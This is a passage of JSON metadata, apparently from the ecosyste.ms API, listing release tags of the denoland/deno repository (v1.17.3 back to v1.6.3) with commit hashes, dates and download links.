3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F